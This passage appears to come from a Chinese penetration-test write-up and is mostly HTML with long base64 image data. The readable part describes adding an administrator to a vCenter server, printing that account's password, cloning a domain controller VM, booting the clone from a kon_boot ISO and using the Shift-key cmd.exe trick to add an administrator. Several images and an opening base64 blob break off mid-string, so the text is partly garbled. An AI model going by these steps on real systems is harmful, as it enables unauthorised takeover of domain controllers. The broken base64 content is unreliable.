SDFlGT61GQ61eVhtr1db+weH/T41vedCWB/uHiWmqqNNSq3XYto1WR71UkmFpfVqFS7WvLd+zZCi7Rr78KJVkONpgBeXMTn6/VH3/ztFeJfpD9f5fbzz1elHv+eWn9ManntIbn31B0m3tPjP8/bak2/rQ8Pen5pgQoCrPq1C7g2fIytqR9dBrK0cmDCXqNof9pZU9D5Sql39ONBqadDstZ0XpsL2Gz5IJ15TZ1pYz7J+H7TuM35jyvC1dfkUzP58rqqe9ZlTl+X9MexlGceJR5fx1xzNU4vP00AzfH2rqnwAAAAAAAABw3pSfFKAX9METVu3feNjQw5L0wjN69FOHuwc8+9zT+pvP3pZ0RY89fHXm/JdLnWeLp0pv7Y+tkEySUF23e8yARKTtSgNw5+hs9KijZjcc1TcJXW1moxLH/GG/RPzJjvayUacjW1Tbysac9jRpzGk4iD8c+Fd6K1t7fetwiGI4oCVjebDG9+h22MMB4vzAVqKu25QbJkrGGjdUdzuSJBlL16fUt0T7DlfX9jblhrkLJKHcQfnHTWLAcaq8X0q+f+dqrxL9oWr/rzueur34op598UV9y/0PSrqtf/rc8Pcrkm7rdwa/P/viSQWdoMLzKrzZywbcnY1cGwz7UqrezQXcs2j7sL2OeZYcDmx31Mz14ROftyXLr2zG53Nl56a9Kj7/RzvNFNsrG2A/omr+uuMZKPN5Ope6+icAAAAAAAAAnDPljw+4/ZI+XTLr8y99sZD27BezQf6Hjxw3MEv+S2EwgDb3ysExwy2Vs+2cY0+SUqVpqr3tm+qGx4yQpAfan/6vRbXEP5uxlfQD2YCBMfjD/oR6l4p/yhbVJ2xNnd4aT50Un5Jb2eCRsaI1s6tEa1oZnAO+bEpKrmvJkKRU48WZstsbWl+xdNziymJQJ7fvcGcCw+krdsoWbKodTNpCOlWvxfbLI5X6W7n372ztNVDq/V6t/9cfz2m4qm++IumFg8FuAEd/n1+l51Wyo73UkWPk2mDYlxY06B3tVnuCV33eVi2/vNmez1Wdr/Yq//yfuNPMQLgbyRs7EqF6/rrjGSr1eTqH+vonAAAAAAAAAJwvFXYKOFm2olJ6/ovlBvGr5r88TLXXs+2NF7LSMyfpNrPtjUeL6AwZhiXH6ys4bi/9SuqLfxZHBw1OVj7+SVtUz701tbEsM7fV9NL1wSrctKdeOlh9OhpIyg+W2vLjvjznmAGY0c4D1V1fKjHLYI7y714V+luF9+9ptFeV/n9x+89VvfMNb9CH3/AGffgNr9NjVyRdWZr8+7c/ohtzXq3a8yoZrVy21tsyR31Jira7Cxn0nupIWw3bt/rztlz5s6jl+XzE+Wmvas//qu1VvX3rjae0up4p5/JZBQAAAAAAAACzK79TQAmffum29OAVPfzAVZVZ3V81/6Vhb2Qrq6PtWlZSJ6Gr5nDs0TRlb2zJs4xsS+OuO//K/prjr8rIltaXf0GV+JOutiNHnrUqW6HCBW5NvX+QSpYhY9nU9SVD6d6OdrQ
<p blockindex=25>成功添加管理员admin，最终的vcenter管理员账号<a href=mailto:admin@ZXZ.COM.local>admin@ZXZ.COM.local</a>/P@ssWord123</p>
<p blockindex=26>最终成功登录vcenter web控制台界面如下：<br>
<img src=data:image/png;base64,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
<p blockindex=27>该vCenter服务器管理68台服务器，存在一个域环境ZXX.COM，锁定域控机器Win2k8R2_DC。如何拿到该域控制器管理员密码呢？</p>
<h4 blockindex=28>攻击域控</h4>
<p blockindex=29>首先克隆域控所在的虚拟机。通过菜单Actions-&gt;Clone-&gt;Clone to Virtual Machine...命名为Win2K8R2_Test，然后稍等一会儿就成功克隆该虚拟机。<br>
<img src="data:image/png;base64,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
<p blockindex=30>在网上下载一个启动盘镜像kon_boot.iso到本地，点击菜单编辑虚拟机，在虚拟机硬件出展开CD/DVD drive 1选择挂载CD/DVD为kon_boot.iso即可，最后启动克隆虚拟机<br>
<img src="data:image/png;base64,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IBBQd955p/rb3/4Wfv7evXvV6NGj1e7du49al9frVTNnzlTDhw9X77zzjqqqqlKGYbR6byAQUI899pi67rrrVGFhoQoEAioUCqnKykr1l7/8Rf36179WgUBAKaWUYRjqX//6l5o+fXqLcjwejxo/frxasWJFs+uVlZWqT58+qri4OPye5eTkqN///veqpKREhUIh5ff71aJFi1ReXp7auXNnuK6//e1vavLkyerbb79Vfr9fGYahqqur1d///nc1btw4df3114df1wcffKAuvvhiVVFRoQzDUH6/X3333XdqyZIlKhQKHfU9a01paWn4tR+v5557Tt12223K5/Op2tpa9aMf/Uhdeuml6l//+pcKhUJq8+bNavz48aq0tFQtXLhQPfXUUyoYDKpZs2aphx56SN14443qoosuUp9//rkKhULq22+/VZs3b1ahUEh5PB51xRVXqA8//FBt2rRJXXnllaqxsVFVV1er22+/XX3++efq1VdfVXfccYdqampSgUBA3XPPPerRRx9VdXV16oorrlAbNmxQSikVCoXU/Pnz1bXXXqsqKirUkiVLVFNTkzIMQ73xxhvq9ttvVz6f76iv94UXXlCzZ89udq2kpET94Q9/UOedd5669dZb1fbt25VSSu3cuVPddNNNaurUqeoPf/iD2r9/v/rv//5vlZiYqM455xw1d+7cE3rPhRBCnB6amprUG2+8oZ577jlVX1+vQqGQKigoUI888ojavXv3YTPN8Wi3fQxLS0uZOnUqeXl5Lb5++ctf0tTUBEBhYSGLFy/mj3/8I7m5uZjNZsxmMz169OCmm26itra2zdpktVqZNWsWF110Ef/93//N8OHDufLKK3nmmWfYtWtXs96lvXv3smDBAmbPnk337t0xm83ouk58fDy33XYbRUVF7Ny5s83aBgeGL2+55RZSUlLQdR2LxcLYsWMZNmwYy5cvBw70rr7yyiv8z//8T3gltaZpxMbGcsstt4SHaA+pqakhOjqamJgYNE3DYrGQlZXFuHHj6IjjECdOnMjmzZuprKxk48aNxMbGcvvtt7No0SK8Xi9ffPEFQ4cOJS4uDrfbTWVlJXBgkVFhYSF33XUXN998M//7v/9LTU0NvXr1Ii8vL9yb63a7iY+PD9dXX1/PfffdR58+fRg9ejQXXnghZrOZKVOmMGHCBEpLS5v1xh6ilKK6uhqHw0FUVBTjxo3D4XBgGAZ79uwhNjb2iD2Zh+P1ennkkUdIT0/nySef5MILL+SJJ56grq6ON998kx49evDEE08wceJEbDYbV111FUOGDOHhhx9mwoQJJ/fmCyGE6NIcDgcXXXQRkZGRvP322yxatIiVK1dy6aWXkp2d3SZTxNptHDEhIYFZs2a1GJ4FiIyMDA+nbdiwgeTkZHJzc5vdo2kaZ511Fv369WuzNh0KUL/73e+44YYb2LFjB1988QVvvfUWc+bM4YYbbuD222/HbrezYcMGmpqa+PLLL1u80YZhoOs6a9eupXfv3m3Wvvj4eBISEppd03Wd7Ozs8MKWffv2YTKZ6NOnT4vnW61WpkyZwtq1a8PXJk6cyAsvvMBVV13Fz3/+c0aPHk18fPwpn194SEZGBikpKaxbt47ly5dz7rnnMmTIEB5//HF27tzJokWLuPHGG1sd4p4
<p blockindex=31>启动成功后连续按5下shift弹出cmd.exe，添加管理员<br>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA4cAAAEcCAYAAAB008E/AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOydd3xUVfr/P3d6yUwmmUwmPSEJvYqQIIiAgIoIghVkQUVksbCI67quur91WXXVVday7CoqFhSVIqEqRWooQkghgRTSSDKTMslMJpne7u8P9t5vJnNnkkAC6J736+XrJZlbzn3uc885zzlPocLCwmgQCAQCgUAgEAgEAuF/Gt61bgCBQCAQCAQCgUAgEK49xDgkEAgEAoFAIBAIBAIxDgkEAoFAIBAIBAKBQIxDAoFAIBAIBAKBQCCAGIcEAoFAIBAIBAKBQAAxDgkEAoFAIBAIBAKBAGIcEggEAoFAIBAIBAIBxDgkEAgEAoFAIBAIBAKIcUggEAgEAoFAIBAIBBDjkEAgEAgEAoFAIBAIIMYhgUAgEAgEAoFAIBBAjEMCgUAgEAgEAoFAIIAYhwQCgUAgEAgEAoFAADEOCQQCgUAgEAgEAoEAYhwSCAQCgUAgEAgEAgHEOCQQCAQCgUAgEAgEAohxSCAQCAQCgUAgEAgEEOOQQCAQCAQCgUAgEAi4CsYhj8cDj0ds0F86fD4fFEVd62YQCAQCgUAIAkVRZLwmEAhXBF8kEr3SVxcXiUSYOnUqRo0ahYaGBtjt9r66FaEPiY6Oxty5c6FQKFBXVweapq91kwgEAoFAIHSif//+mD17NjweD5qamq51cwgEwi8QQVhYWMAfaZqGy+WC2+2+oosLhUKMGTMGcXFxOH/+PGw2GxwOR+gGCQQQi8WgKAo0TcPhcMDn80EqlcLn88HhcEAkEkEkEgEA+zefzxdwPhc0TcPtdsPlcgG4tMomkUjA5/NB0zQ8Hg+cTqffOTweDxKJpMc7oDRNw263s23jgqIoSKVSv2vTNA2n0wmPx9OlbGiahkQigc/ng9PphEAggEgkAkVRAbJh6Ci/YO3ueP+IiAhMmzYNZ86cQVFREaxW6xXrBuHK6Ki3nWF0w+v1cp4rkUggEAg4zwuld73RJxAIhECY8YWrv74e6NzfeDyeLsfyK0UoFLJjGYPX62XHve7SXdmGGud9Ph/sdjvnfa+kL+5NeDwepFIp0tLSMGPGDDQ3N6OwsLDP70sgEH59UKtXrw7o7WiaxsGDB3HkyJErGqgEAgEGDBiA5ORkDBs2DA0NDdi8eXPQHUSKojBy5EjcddddEIlEsNls2LJlC4xGIxYtWgSDwYBNmzYhMzMTU6dOBUVRaGtrw5dffsmukI0dOxYzZszgnPwClwaX7OxsHDp0CF6vFxEREbjvvvuQmJgIn8+H3Nxc/PDDD36T4Li4ODzwwAOIjIzs0fNbLBZ8++23qKmpCXpMeHg4Fi5ciOjoaPZvLpcLu3fvRl5ent9gNHLkSMyaNYuVzffffw+z2Yx7770XZrMZWVlZGDlyJKZOnQqhUAiTyYTvv/8eFy9eZK/B5/Nx22234aabbgraJrfbje3bt6OgoAAAoFAoMHToUPTr1w/p6enYv38/Tp48SXYQryFKpRLz589HfHx8wG9WqxWbNm1CZWVlwG9isRhz5szB0KFDA37zeDzYtWsXzpw54/f3YcOGYfbs2Thy5Aiys7N77yEIBAJEIhHuvvtuJCQkYNOmTairq7vWTQpALpfj/vvvR2pqKmiaxrlz55CVlcU